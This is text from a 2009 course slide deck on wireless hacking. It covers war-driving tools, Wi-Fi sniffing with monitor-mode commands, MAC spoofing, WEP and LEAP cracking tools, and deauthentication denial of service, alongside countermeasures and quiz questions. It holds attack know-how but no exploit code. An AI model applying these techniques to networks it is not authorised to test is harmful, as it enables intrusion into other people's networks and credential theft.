Chapter 8Chapter 8

Wireless Hacking Wireless Hacking

Last modified 3-27-09

Equipment Equipment

Windows x. LinuxWindows x. Linux

WindowsWindows– Wireless NIC drivers are easy to getWireless NIC drivers are easy to get– Wireless hacking tools are few and weakWireless hacking tools are few and weak

Unless you pay for AirPcap devices (link Ch 819) Unless you pay for AirPcap devices (link Ch 819) or OmniPeekor OmniPeek

Linux Linux – Wireless NIC drivers are hard to get and Wireless NIC drivers are hard to get and

installinstall– Wireless hacking tools are much betterWireless hacking tools are much better

OmniPeekOmniPeek

WildPackets now packages AiroPeek & WildPackets now packages AiroPeek & EtherPeek together into OmniPeekEtherPeek together into OmniPeek

A Windows-based sniffer for wireless and A Windows-based sniffer for wireless and wired LANswired LANs

Only supports a few wireless NICsOnly supports a few wireless NICs– See links Ch 801, Ch 802See links Ch 801, Ch 802

Prism2 ChipsetsPrism2 Chipsets

For Linux, the three best chipsets to use For Linux, the three best chipsets to use are Orinoco, Prism2.x/3, and Ciscoare Orinoco, Prism2.x/3, and Cisco– Links Ch 803, 804, 805Links Ch 803, 804, 805

AntennasAntennas

Omnidirectional Omnidirectional antenna sends and antenna sends and receives in all receives in all directionsdirections

Directional antennas Directional antennas focus the waves in focus the waves in one directionone direction– The Cantenna shown The Cantenna shown

is a directional antennais a directional antenna

Stacked AntennasStacked Antennas

Quad stacked antenna Quad stacked antenna – Four omnidirectional antennas Four omnidirectional antennas

combined to focus the beam away combined to focus the beam away from the verticalfrom the vertical

– Beamwidth: 360° Horizontal, 15° Beamwidth: 360° Horizontal, 15° VerticalVertical

– Can go half a mileCan go half a mile– Link Ch 806Link Ch 806

WISPerWISPer

Uses "multi-polarization" Uses "multi-polarization" to send through trees to send through trees and other obsctructionsand other obsctructions– Link Ch 807Link Ch 807

Global Positioning System (GPS)Global Positioning System (GPS)

Locates you using signals Locates you using signals from a set of satellitesfrom a set of satellites

Works with war-driving Works with war-driving software to create a map of software to create a map of access pointsaccess points– Link Ch 808Link Ch 808

Pinpoint your Location with Wi-FiPinpoint your Location with Wi-Fi(not in book)(not in book)

Skyhook uses Skyhook uses wardriving to make a wardriving to make a database with the database with the location of many Wi-Fi location of many Wi-Fi access points access points Can locate any Can locate any portable Wi-Fi deviceportable Wi-Fi deviceAn alternative to GPSAn alternative to GPS– Link Ch 809 Link Ch 809

iPhoneiPhone

The iPhone combines GPS, Wi-Fi, and cell The iPhone combines GPS, Wi-Fi, and cell tower location technology to locate youtower location technology to locate you– Link Ch 820Link Ch 820

You can wardrive with the Android phone You can wardrive with the Android phone and Wifiscanand Wifiscan– Links Ch 821-823Links Ch 821-823

War-Driving Software War-Driving Software

TermsTerms

Service Set Identifier Service Set Identifier (SSID)(SSID)– An identifier to distinguish An identifier to distinguish

one access point from one access point from another another

Initialization Vector (IV)Initialization Vector (IV)– Part of a Wired Equivalent Part of a Wired Equivalent

Privacy (WEP) packetPrivacy (WEP) packet– Used in combination with Used in combination with

the shared secret key to the shared secret key to cipher the packet's data cipher the packet's data

NetStumbler NetStumbler

Very popular Windows-based war-driving Very popular Windows-based war-driving applicationapplicationAnalyzes the 802.11 header and IV fields Analyzes the 802.11 header and IV fields of the wireless packet to find:of the wireless packet to find:– SSIDSSID– MAC addressMAC address– WEP usage and WEP key length (40 or 128 WEP usage and WEP key length (40 or 128

bit)bit)– Signal rangeSignal range– Access point vendor Access point vendor

How NetStumbler WorksHow NetStumbler Works

NetStumbler broadcasts 802.11 Probe NetStumbler broadcasts 802.11 Probe RequestsRequestsAll access points in the area send 802.11 All access points in the area send 802.11 Probe Responses containing network Probe Responses containing network configuration information, such as their configuration information, such as their SSID and WEP statusSSID and WEP statusIt also uses a GPS to mark the positions of It also uses a GPS to mark the positions of networks it findsnetworks it finds– Link Ch 810Link Ch 810

NetStumbler ScreenNetStumbler Screen

NetStumbler Countermeasures NetStumbler Countermeasures

NetStumbler's relies on the Broadcast NetStumbler's relies on the Broadcast Probe RequestProbe Request

Wireless equipment vendors will usually Wireless equipment vendors will usually offer an option to disable this 802.11 offer an option to disable this 802.11 feature, which effectively blinds feature, which effectively blinds NetStumbler NetStumbler – But it doesn't blind KismetBut it doesn't blind Kismet

KismetKismet

Linux and BSD-based wireless sniffer Linux and BSD-based wireless sniffer

Allows you to track wireless access points and Allows you to track wireless access points and their GPS locations like NetStumblertheir GPS locations like NetStumbler

Sniffs for 802.11 packets, such as Beacons and Sniffs for 802.11 packets, such as Beacons and Association RequestsAssociation Requests– Gathers IP addresses and Cisco Discovery Protocol Gathers IP addresses and Cisco Discovery Protocol

(CDP) names when it can (CDP) names when it can

Kismet Countermeasures Kismet Countermeasures – There's not much you can do to stop Kismet from There's not much you can do to stop Kismet from

finding your networkfinding your network

Kismet FeaturesKismet Features

Windows version Windows version – Runs on cygwin, only supports two types of Runs on cygwin, only supports two types of

network cardsnetwork cards

Airsnort compatible weak-iv packet loggingAirsnort compatible weak-iv packet logging

Runtime decoding of WEP packets for Runtime decoding of WEP packets for known networks known networks

Kismet ScreenshotKismet Screenshot

For Kismet, see link Ch 811For Kismet, see link Ch 811

Kismet DemoKismet Demo

– Use the Linksys WUSB54G ver 4 nicsUse the Linksys WUSB54G ver 4 nics– Boot from the Backtrack 2 CDBoot from the Backtrack 2 CD– Start, Backtrack, Radio Network Analysis, Start, Backtrack, Radio Network Analysis,

80211, All, Kismet80211, All, Kismet

WardrivingWardriving

Finding Wireless networks with a portable Finding Wireless networks with a portable devicedevice– Image from Image from

overdrawnoverdrawn.net.net

VistumblerVistumbler

Link Ch 818Link Ch 818

CainCain

WiGLEWiGLE

Collects wardriving data from usersCollects wardriving data from users

Has over 16 million recordsHas over 16 million records– Link Ch 825Link Ch 825

Wireless Scanning and Wireless Scanning and Enumeration Enumeration

Goal of Scanning and EnumerationGoal of Scanning and Enumeration– To determine a method to gain system access To determine a method to gain system access

For wireless networks, scanning and For wireless networks, scanning and enumeration are combined, and happen enumeration are combined, and happen simultaneously simultaneously

Wireless SniffersWireless Sniffers

Not really any different from wired sniffersNot really any different from wired sniffers

There are the usual issues with drivers, There are the usual issues with drivers, and getting a card into monitor modeand getting a card into monitor mode

Wireshark WiFi DemoWireshark WiFi Demo

– Use the Linksys WUSB54G ver 4 nicsUse the Linksys WUSB54G ver 4 nics– Boot from the Backtrack 2 CDBoot from the Backtrack 2 CD– In Konsole:In Konsole:

ifconfig rausb0 upifconfig rausb0 up

iwconfig rausb0 mode monitoriwconfig rausb0 mode monitor

wiresharkwireshark

iClicker Questions

Which antenna sends power most tightly focused in a single direction?

A

D

C

B

1 of 3

Which tool runs only on Linux?

A.NetStumblerB.KismetC.VistumblerD.CainE.Wireshark

2 of 3

Which tool gives you the most complete information about every Wi-Fi frame sent?

A.NetStumblerB.KismetC.VistumblerD.CainE.Wireshark

3 of 3

Identifying Wireless Network Identifying Wireless Network DefensesDefenses

SSID SSID

SSID can be found from any of these framesSSID can be found from any of these frames– BeaconsBeacons

Sent continually by the access point (unless disabled)Sent continually by the access point (unless disabled)

– Probe RequestsProbe Requests Sent by client systems wishing to connectSent by client systems wishing to connect

– Probe ResponsesProbe ResponsesResponse to a Probe RequestResponse to a Probe Request

– Association and Reassociation RequestsAssociation and Reassociation RequestsMade by the client when joining or rejoining the networkMade by the client when joining or rejoining the network

If SSID broadcasting is off, just send If SSID broadcasting is off, just send adeauthentication frame to force a reassociationadeauthentication frame to force a reassociation

MAC Access ControlMAC Access Control

CCSF uses this techniqueCCSF uses this technique

Each MAC must be entered into the list of Each MAC must be entered into the list of approved addressesapproved addresses

High administrative effort, low securityHigh administrative effort, low security

Attacker can just sniff MACs from clients Attacker can just sniff MACs from clients and spoof themand spoof them

Gaining Access Gaining Access (Hacking 802.11)(Hacking 802.11)

Specifying the SSIDSpecifying the SSID

In Windows, just select it from the In Windows, just select it from the available wireless networksavailable wireless networks– In Vista, right-click the network icon in the taskbar tray In Vista, right-click the network icon in the taskbar tray

and click "Connect to a Network"and click "Connect to a Network"– If the SSID is hidden, click "Set up a connection or If the SSID is hidden, click "Set up a connection or

network" and then click "Manually connect to a network" and then click "Manually connect to a wireless network"wireless network"

Changing your MACChanging your MAC

Bwmachak changes a NIC under Windows Bwmachak changes a NIC under Windows for Orinoco cardsfor Orinoco cards

SMAC is SMAC is easy easy

link Ch 812link Ch 812

Device ManagerDevice Manager

Many Wi-Fi Many Wi-Fi cards allow cards allow you to you to change the change the MAC in MAC in Windows' Windows' Device Device ManagerManager

Attacks Against the WEP Algorithm Attacks Against the WEP Algorithm

Brute-force keyspace – takes weeks even Brute-force keyspace – takes weeks even for 40-bit keysfor 40-bit keys

Collect Initialization Vectors, which are Collect Initialization Vectors, which are sent in the clear, and correlate them with sent in the clear, and correlate them with the first encrypted bytethe first encrypted byte– This makes the brute-force process much This makes the brute-force process much

fasterfaster

Tools that Exploit WEP Tools that Exploit WEP Weaknesses Weaknesses

AirSnort AirSnort

WLAN-Tools WLAN-Tools

DWEPCrack DWEPCrack

WEPAttack WEPAttack – Cracks using the weak IV flawCracks using the weak IV flaw

Best countermeasure – use WPABest countermeasure – use WPA

HotSpotterHotSpotter

Hotspotter--Like SSLstrip, it silently Hotspotter--Like SSLstrip, it silently replaces a secure WiFi connection with an replaces a secure WiFi connection with an insecure oneinsecure one

Works because Windows allows it, Works because Windows allows it, apparently happy to accept an insecure apparently happy to accept an insecure network as part of the same WLANnetwork as part of the same WLAN– Link Ch 824Link Ch 824

Lightweight Extensible Lightweight Extensible Authentication Protocol (LEAP)Authentication Protocol (LEAP)

What is LEAP?What is LEAP?

A proprietary protocol from Cisco Systems A proprietary protocol from Cisco Systems developed in 2000 to address the security developed in 2000 to address the security weaknesses common in WEP weaknesses common in WEP

LEAP is an 802.1X schema using a LEAP is an 802.1X schema using a RADIUS serverRADIUS server

As of 2004, 46% of IT executives in the As of 2004, 46% of IT executives in the enterprise said that they used LEAP in their enterprise said that they used LEAP in their organizations organizations

The Weakness of LEAPThe Weakness of LEAP

LEAP is fundamentally weak because it LEAP is fundamentally weak because it provides zero resistance to offline provides zero resistance to offline dictionary attacksdictionary attacks

It solely relies on MS-CHAPv2 (Microsoft It solely relies on MS-CHAPv2 (Microsoft Challenge Handshake Authentication Challenge Handshake Authentication Protocol version 2) to protect the user Protocol version 2) to protect the user credentials used for Wireless LAN credentials used for Wireless LAN authentication authentication

MS-CHAPv2MS-CHAPv2

MS-CHAPv2 is notoriously weak becauseMS-CHAPv2 is notoriously weak because– It does not use a SALT in its NT hashesIt does not use a SALT in its NT hashes– Uses a weak 2 byte DES keyUses a weak 2 byte DES key– Sends usernames in clear textSends usernames in clear text

Because of this, offline dictionary and brute Because of this, offline dictionary and brute force attacks can be made much more efficient force attacks can be made much more efficient by a very large (4 gigabytes) database of likely by a very large (4 gigabytes) database of likely passwords with pre-calculated hashes passwords with pre-calculated hashes – Rainbow tablesRainbow tables

Cisco's DefenseCisco's Defense

LEAP is secure if the passwords are long and LEAP is secure if the passwords are long and complexcomplex– 10 characters long with random upper case, lower 10 characters long with random upper case, lower

case, numeric, and special characters case, numeric, and special characters

The vast majority of passwords in most The vast majority of passwords in most organizations do not meet these stringent organizations do not meet these stringent requirementsrequirements– Can be cracked in a few days or even a few minutes Can be cracked in a few days or even a few minutes

For more info about LEAP, see link Ch 813For more info about LEAP, see link Ch 813

LEAP Attacks LEAP Attacks

Anwrap Anwrap

Performs a dictionary attack on LEAPPerforms a dictionary attack on LEAP

Written in Perl, easy to useWritten in Perl, easy to use

AsleapAsleap

Grabs and decrypts weak LEAP Grabs and decrypts weak LEAP passwords from Cisco wireless access passwords from Cisco wireless access points and corresponding wireless cards points and corresponding wireless cards

Integrated with Air-Jack to knock Integrated with Air-Jack to knock authenticated wireless users off targeted authenticated wireless users off targeted wireless networks wireless networks – When the user reauthenticates, their When the user reauthenticates, their

password will be sniffed and cracked with password will be sniffed and cracked with Asleap Asleap

Countermeasures for LEAPCountermeasures for LEAP

Enforce strong passwordsEnforce strong passwords

Continuously audit the services to make Continuously audit the services to make sure people don't use poor passwordssure people don't use poor passwords

WPAWPA

WPA is strongWPA is strong

No major weaknessesNo major weaknesses

However, if you use a weak Pre-Shared However, if you use a weak Pre-Shared Key, it can be found with a dictionary Key, it can be found with a dictionary attackattack

Tool: Aircrack-ngTool: Aircrack-ng

Denial of Service (DoS) Attacks Denial of Service (DoS) Attacks

Radio InterferenceRadio Interference– 802.11a, 11b, and 11g all use the 2.4-2.5GHz 802.11a, 11b, and 11g all use the 2.4-2.5GHz

ISM band, which is extremely crowded at the ISM band, which is extremely crowded at the moment moment

Unauthenticated Management FramesUnauthenticated Management Frames– An attacker can spoof a deaauthentication An attacker can spoof a deaauthentication

frame that looks like it came from the access frame that looks like it came from the access pointpoint

– wlan_jack in the Air-Jack suite does thiswlan_jack in the Air-Jack suite does this

iClicker Questions

Which Cisco proprietary wireless security protocol is vulnerable, but still widely used?

A. WPA2B. WPAC. LEAPD. WEPE. MAC Address Filtering

1 of 4

Which wireless security protocol is the weakest, vulnerable to a trivial sniffing attack?

A. WPA2B. WPAC. LEAPD. WEPE. MAC Address Filtering

2 of 4

Which wireless security protocol is vulnerable to DoS via deauthentication frame injection?

A. WPA2B. WPAC. LEAPD. WEPE. All of the above

3 of 4

Which wireless security protocol requires the most administrative effort to implement and maintain?

A. WPA2B. WPAC. LEAPD. WEPE. MAC Address Filtering

4 of 4